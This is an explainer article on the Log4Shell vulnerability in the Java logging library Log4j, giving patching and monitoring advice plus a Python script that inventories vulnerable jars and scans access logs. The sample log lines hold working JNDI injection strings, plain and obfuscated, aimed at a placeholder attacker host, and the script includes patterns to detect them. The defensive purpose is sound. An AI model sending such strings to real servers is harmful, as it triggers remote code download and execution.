Log4j: The Basics

If you’ve heard about something called ‘Log4j’ that’s got the Internet – and the cyber security establishment – rattled, you might be wondering what you need to do right now.

What is Log4j? Log4j is an open-source Java logging library, maintained by the Apache Software Foundation, that developers pull into the applications and services they build to record what those systems are doing (for administration, operations, security audit, and so on). Because it is a library rather than a stand-alone product, it is usually buried inside other software, which is why most organisations do not know where they are running it.

What’s the issue? A vulnerability in Log4j (CVE-2021-44228, nicknamed ‘Log4Shell’) means that an attacker who can get a specially crafted string written into a log – for example by putting it in a web request header or a username field – can make the vulnerable server fetch and run code from a host the attacker controls. From there they can steal confidential data, render systems unavailable, or deploy other types of malware that go on to cause further damage.

What’s the fix? The technical fix itself is simple. Updating Log4j to the fixed release (2.16.0 at the time of writing; Apache has since issued further 2.x releases, so take the current version from the Apache Log4j security page) removes the vulnerability. Note that 2.15.0, the first patch, was incomplete and should not be treated as a fix. The hard part is not applying the update but finding every copy of Log4j you depend on.

So what’s all the fuss about? There are two big factors here. The first is that the vulnerability is very accessible (easy to exploit) for even novice cyber-criminals: a single line of text in a web request is enough to test for it. Attackers have already been on this for some days, and we’re likely to see many Log4j-related cyber attacks over the coming weeks. The second factor is that the systems on which Log4j is running are everywhere – embedded in systems used by home users, supporting SaaS solutions, and deployed by our suppliers to deliver services to our organisations.

What should we be doing about it? If you’re reading this and you’re a home user or one-person band with little dependence on corporate IT systems, the biggest step you can take is to check that your computer – and the applications that run on it – are bang up to date with the latest operating system and software versions. While you’re at it, take time to change passwords for online services you use, and make sure that those passwords are different from each other.

For larger companies the picture is more complex. At a minimum, you should:

  • Check internal systems and applications for use of Log4j, including copies bundled inside vendor software and container images, and update to version 2.16.0 or later (the list of affected software published by the Dutch NCSC is a great resource to help you). Log4j 1.x is end-of-life and is not fixed by this update; treat it as a separate finding
  • Stay in regular contact with software vendors so that updates / patches supplied by them can be applied as soon as they become available
  • Contact all your key suppliers and verify that they too are taking sensible steps to protect the networks and systems they use to deliver services to you
  • Ensure in-house software development teams are fully aware of the vulnerability and that new builds pin a fixed version of Log4j, including where it arrives indirectly through another dependency
  • Validate and update firewall rules: the exploit relies on the vulnerable server making an outbound LDAP, RMI or DNS connection to the attacker’s host, so restricting outbound traffic from servers to what they actually need blunts the attack even before patching
  • Where you have the capability, monitor for external scanning of your networks, for ‘${jndi:’ lookup strings (including obfuscated variants) in web and application logs, and for signs of unusual network / system activity such as servers making outbound connections they have never made before.
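As an added example (not part of the original article) of what the first and last of those steps look like in practice, the script below does two things: it classifies Log4j jar files by version against the 2.16.0 fix level named above, and it scans web-server access log lines for JNDI lookup strings, de-obfuscating the nested `${lower:…}` and `${…:-x}` lookup forms that attackers use to defeat a plain grep for `${jndi:`. The file paths, log lines and IP addresses are constructed for the example (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).

```python
"""Log4j triage helpers: jar inventory by version, and access-log scanning
for JNDI lookups including common obfuscations. Added example; all sample
data below is constructed, not taken from a real system."""

import os
import re

FIXED_VERSION = (2, 16, 0)  # fix level named in the article

# Matches log4j-core-2.14.1.jar and log4j-1.2.17.jar, but not log4j-api-*.jar
JAR_RE = re.compile(r"log4j(?:-core)?-(\d+)\.(\d+)\.(\d+)\.jar$")
# Innermost ${...} lookup (no nested braces inside)
LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup once obfuscation has been stripped: scheme and host[:port]
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)

# Constructed sample data
SAMPLE_JARS = [
    "/opt/app/lib/log4j-core-2.14.1.jar",
    "/opt/app/lib/log4j-api-2.14.1.jar",
    "/opt/legacy/lib/log4j-1.2.17.jar",
    "/opt/other/lib/log4j-core-2.16.0.jar",
]
SAMPLE_ACCESS_LOG = """\
198.51.100.7 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"
203.0.113.9 - - [10/Dec/2021:10:01:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"
203.0.113.9 - - [10/Dec/2021:10:01:07 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5:1099/x} HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.9 - - [10/Dec/2021:10:01:08 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:dns://203.0.113.5/x}"
198.51.100.8 - - [10/Dec/2021:10:01:09 +0000] "GET /search?q=${price} HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""


def classify_jar(path):
    """Return (version, verdict) for a Log4j jar name, or None if the name is
    not a Log4j jar. Verdicts: 'end-of-life' (1.x), 'vulnerable' (2.x below
    the fix level), 'fixed'."""
    m = JAR_RE.search(os.path.basename(path))
    if not m:
        return None
    version = tuple(int(x) for x in m.groups())
    if version[0] < 2:
        verdict = "end-of-life"
    elif version < FIXED_VERSION:
        verdict = "vulnerable"
    else:
        verdict = "fixed"
    return version, verdict


def inventory(paths):
    """Return [(path, version, verdict)] for every Log4j jar that is not fixed."""
    findings = []
    for p in paths:
        c = classify_jar(p)
        if c and c[1] != "fixed":
            findings.append((p, c[0], c[1]))
    return findings


def walk_jars(root):
    """Walk a directory tree and run inventory() over every .jar found."""
    return inventory(os.path.join(d, f) for d, _, files in os.walk(root)
                     for f in files if f.endswith(".jar"))


def resolve_lookups(s, max_rounds=20):
    """Reduce nested lookups the way Log4j's string substitution would, far
    enough to expose a hidden 'jndi:'. Handles ${lower:x}, ${upper:x} and the
    default-value form ${anything:-x} (so ${::-j} and ${env:NOPE:-j} both
    become j). Unknown lookups such as ${price} are left untouched."""
    for _ in range(max_rounds):
        changed = False

        def sub(m):
            nonlocal changed
            body = m.group(1)
            if ":-" in body:                       # ${...:-default}
                changed = True
                return body.split(":-", 1)[1]
            kind, sep, rest = body.partition(":")
            if sep and kind.lower() in ("lower", "upper"):
                changed = True
                return rest.lower() if kind.lower() == "lower" else rest.upper()
            return m.group(0)

        s = LOOKUP_RE.sub(sub, s)
        if not changed:
            break
    return s


def find_jndi(line):
    """Return (scheme, target) if the line carries a JNDI lookup, else None."""
    m = JNDI_RE.search(resolve_lookups(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan_access_log(text):
    """Return [(line_number, scheme, target)] for each line with a JNDI lookup."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        hit = find_jndi(line)
        if hit:
            hits.append((n, hit[0], hit[1]))
    return hits


if __name__ == "__main__":
    for path, version, verdict in inventory(SAMPLE_JARS):
        print(f"{path}: {'.'.join(map(str, version))} is {verdict}")
    for n, scheme, target in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {n}: JNDI lookup via {scheme} to {target}")
```

The jar check keys only on file names, so it will miss Log4j classes repackaged inside a fat jar or a shaded dependency; for those, a check that inspects jar contents (for example, looking for `JndiLookup.class` inside each archive) is needed. The targets that the log scanner reports are the hosts a compromised server would have been made to connect to, which makes them a good starting point for firewall egress rules and for checking outbound connection logs.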

Finally, it’s better to ensure that networks and systems are sufficiently resilient to cope with the impact of an attack than to assume that you can prevent an attack from hitting you in the first place. Examine your business continuity arrangements closely and ensure that measures designed to keep the business running in the event of a cyber event – such as backup and incident response processes – are up to date and have been tested.

If you’re worried about Log4j and are not sure where to start in terms of protecting your organisation, send me a Direct Message.
